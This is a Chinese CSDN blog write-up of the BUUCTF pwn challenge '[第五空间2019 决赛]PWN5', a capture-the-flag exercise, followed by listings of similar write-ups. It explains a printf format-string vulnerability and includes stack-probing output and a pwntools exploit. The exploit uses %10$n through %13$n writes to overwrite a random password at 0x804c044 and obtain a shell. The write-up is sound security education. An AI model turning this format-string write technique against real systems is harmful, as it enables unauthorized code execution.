BUUCTF Pwn [第五空间2019 决赛]PWN5

最新推荐文章于 2024-07-05 00:13:46 发布
最新推荐文章于 2024-07-05 00:13:46 发布
阅读量993 收藏 1
点赞数 1
分类专栏: Pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MrTreebook/article/details/122140571
版权
本文详细介绍了如何利用格式化字符串漏洞进行攻击。通过分析程序的checksec信息,发现存在开启的canary但未启用PIE。在IDA中分析主函数,找到了printf函数的漏洞。通过输入特定格式的字符串,确定了输入参数在栈上的位置。利用%n来修改栈上的随机数,构造payload并成功修改了内存中的值。最终,通过发送payload和目标地址,成功触发system调用,完成exploit。
摘要由CSDN通过智能技术生成

BUUCTF Pwn [第五空间2019 决赛]PWN5

1.题目下载地址

点击下载

2.checksec

在这里插入图片描述

  • 开启了canary
  • 没有PIE

2.IDA分析

在这里插入图片描述

  • 查看主函数,函数的功能是读入一个4位的随机密码,再将我们输入的密码与随机生成数比较,相同就执行system
  • 这里面的printf()存在格式化字符串漏洞

1.利用 "AAAA %08x %08x %8x %08x %08x %08x %08x………… ",这样的字符串来找到我们输入的参数在函数栈上的位置,我看别的师傅叫首地址偏移或者偏移量

2.假设是在栈上第n位,那么可以利用 %n$ 定位到参数在栈上的位置

3.利用%n来修改参数里的内容,我们不知道读入的随机数是多少,那么我们将它改成我们写入的数据不就好了

  • 首先我们要定位到我们输入的字符串在栈上的位置。
lwj@ubuntu:~/Desktop/pwn/fifth_space_pwn5$ ./pwn
your name:aaaa %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x
Hello,aaaa ffc83c68 00000063 00000000 f7f38a9c 00000003 f7f0b410 00000001 00000000 00000001 61616161 38302520 30252078 25207838 20783830 78383025 38302520 30252078 25207838
  • 我们输入的参数是在栈上的第10个,后面可以直接利用 %10$ 定位到这个位置。
  • 随机生成函数的位置是0x804c044开始的,长度为4字节,依次+1即可。
    在这里插入图片描述
  • 所以可以用%10 , ,%11 ,,%12 , ,%13 ,去定位到这4个地址,再用%n修改这这个地址里的内容,因此构造payload

4.exp

from pwn import*

r=remote('node3.buuoj.cn',26959)

payload=p32(0x804c044)+p32(0x804c045)+p32(0x804c046)+p32(0x804c047)
payload+='%10$n%11$n%12$n%13$n'

r.sendline(payload)
r.sendline(str(0x10101010))
r.interactive()
==Microsoft==
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
BUUCTF-Pwn-[第五空间2019 决赛]PWN5
餐桌上的猫
02-15 371
题目截图 检查文件信息 这是一个32位的程序,开启了NX和Canary 用IDA打开查看找到来能getshell的代码 反汇编查看主函数功能,程序将我们输入的passwd与存放在804c044地址的数进行比较,正确就可以getshell了,红框中存在格式化字符串漏洞,我们可以利用该漏洞重写804c044地址处的数据来getshell 测试我们输入的内容在栈中的位置,是第10个 exp from pwn import* r=remote('node4.buuoj.cn',28850) addr=
buuctf——[第五空间2019 决赛]PWN5 1
qq_41560595的博客
03-17 4460
查看文件权限 设置了canary,无法栈溢出。 F5查看源程序 源程序大意是把随机数放入到bss段的0x804c044处,用户输入用户名和密码,如果密码和随机数相等,则拿到权限。 解题思路 看到了printf,又加了canary权限,可以想到考查格式化字符串漏洞。可以更改0x804c044处的值,所以要精心构造一个合适的格式化字符串。构造的方法很多。 在用户输入用户名处,先输入一个AAAA,试探会写在栈的哪个位置。 “AAAA”写在了第10个位子。构造: bss=0x804c044 payload=b
[buuctf][第五空间2019 决赛]PWN5
逆向萌新的博客
06-19 397
[buuctf][第五空间2019 决赛]PWN5
BUUCTF-PWN】7-[第五空间2019 决赛]PWN5
最新发布
燕麦葡萄干的博客
07-05 483
因此将正常的printf语句转为无参数的printf,即将参数放到格式化字符串前面构造payload,从而利用%n将前面的字符数写入到指定地址中,passwd的每个字节即写入地址中的值是p32(0x804c047)+p32(0x804c046)+p32(0x804c045)+p32(0x804c044)的长度,也就是4x4=16,二进制为0x10,所以passwd就是4个0x10拼接起来后的计算结果str(0x10101010)=269488144。32位小端排序,有栈溢出保护。存在格式化字符串漏洞。
BUUCTF [第五空间2019 决赛]PWN5
红叶的博客
10-31 1488
输入探测格式化字符串的payload,AAAA-%x-%x-%x-%x-%x,A的ASCII码值为65(0x41),因此是图中选中的段。通过 fmtstr_payload 将 dword_804C044 的内容替换为0x1,而非随机数。因为我们已经知道偏移量了,可以使用pwntools的 fmtstr_payload 函数。但是这次是将 dword_804C044 修改为任意值,然后再次输入此值即可获取shell。或者还有一个,AAAA-%p-%p-%p-%p-%p-%p,32位64位通用。
BUUCTF - [第五空间2019 决赛]PWN5
Sakura给爷pwn全场
02-03 255
from pwn import * context(arch='i386',os='linux',log_level='debug',binary='pwn5') io=remote('node3.buuoj.cn',28518) elf=ELF('./pwn5') io.recvuntil('your name:') unk_addr=0x0804C044 payload=p32(unk_addr)+'%10$n' io.sendline(payload) io.recvuntil('your passw
BUUCTF|PWN-[第五空间2019 决赛]PWN5-WP
l2645470582_的博客
01-10 962
1.检查保护机制 (1)开启了金丝雀和堆栈保护 (2)该文件是32位的文件 2.用32位的IDA打开该文件 (1)F12查看关键字符串 (2)我们进入反编译代码看看,看到nptr=unk_804C044才能获取权限 (3)unk_804C044有4个字节 (4)printf(&buf);存在格式化字符串漏洞 (5)kali运行该文件,用%p看出偏移量为10,利用%10$n定位到这个位置 payload构造 payload = p32(0x804C044...
【BUU】[第五空间2019 决赛]PWN5
bzduanlei的博客
07-31 433
一、前置知识 1、%n,不输出字符,但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量。 2、如何确定存储格式化字符串的地址是 printf 将要输出的第几个参数? ​ 运行程序后,在格式化字符串漏洞的位置输入AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p,看AAAA的数值对应在格式化字符串的第几个参数。 可以看到,AAAA对应的数值0x41414141在格式化字符串的第10个参数。 二、解题思路 0x01 分析文件 0x02 拖入IDA 3
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在...
BUUCTFpwn】解题记录(1-3页已完结)
Assassin
05-05 1926
文章目录ripwarmup_csaw_2016ciscn_2019_n_1pwn1_sctf_2016jarvisoj_level0ciscn_2019_c_1(栈溢出+ret2libc+plt调用)[第五空间2019 决赛]PWN5ciscn_2019_n_8jarvisoj_level2[OGeek2019]babyropbjdctf_2020_babystackget_started_3dsctf_2016(mprotect+read+shellcode)cn_2019_en_2jarvisoj_le
[第五空间2019 决赛]PWN5
weixin_56301399的博客
07-21 1640
格式化字符串漏洞
[BUUCTF]PWN——[第五空间2019 决赛]PWN5
BangSen1的博客
03-25 4537
[第五空间2019 决赛]PWN5 例行检查,32位,开启了canary保护和NX保护。 运行一下。 IDA打开,看到了/bin/sh,但开启了保护 查看主函数,函数的功能是读入一个4位的随机密码,再将我们输入的密码与随机生成数比较,相同就执行system 这里面的printf()存在格式化字符串漏洞 按我的理解就是输入的参数的个数是不固定的,是由前面的格式化字符串决定的,所以我们只要控制了前面的格式化字符串,再结合一些参数,后面输出什么就是由我们决定的;如: %d 用于读取10进制数值 %x
[BUUCTF-pwn]——[第五空间2019 决赛]PWN5
Y_peak的博客
02-21 353
[BUUCTF-pwn]——[第五空间2019 决赛]PWN5 题目地址:https://buuoj.cn/challenges#[第五空间2019%20决赛]PWN5 题目: 这是一道格式化字符串的题,给大家讲解下 checksec一下看看, 开启了canary保护, 基本开启这个保护都会用到格式化字符串的漏洞。 在IDA中 利用pwndbg看看, 偏移是多少。 0xa也就是 10 思路 利用格式化字符串漏洞, 修改unk_804C044的值, 并且输入相等的值 exploit from p
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

==Microsoft==

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值